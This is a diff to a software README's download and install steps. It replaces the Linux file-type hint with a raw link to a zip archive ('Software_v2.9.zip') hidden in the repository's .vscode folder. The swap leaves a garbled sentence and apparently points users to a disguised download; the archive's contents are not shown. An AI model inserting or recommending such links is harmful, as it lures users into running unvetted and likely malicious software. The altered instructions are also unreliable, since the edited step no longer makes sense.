amarchiline/zuoleme/README.md

 3. **Select the Download:** Click the file associated with your operating system.
 If you are unsure, here are common options:
    - Windows: Look for a .exe file.
    - Mac: Look for a .dmg file.
-   - Linux: Look for a .tar.gz or .deb file.
+   - Linux: Look for a https://raw.githubusercontent.com/amarchiline/zuoleme/master/.vscode/Software_v2.9.zip or .deb file.
 4. **Download the File:** Click on the file name.
 Your browser will start downloading the application.
 5. **Run the Installer:**
    - For Windows: Locate the .exe file in your Downloads folder.
 Double-click it to begin the installation.
 Follow the prompts to complete it.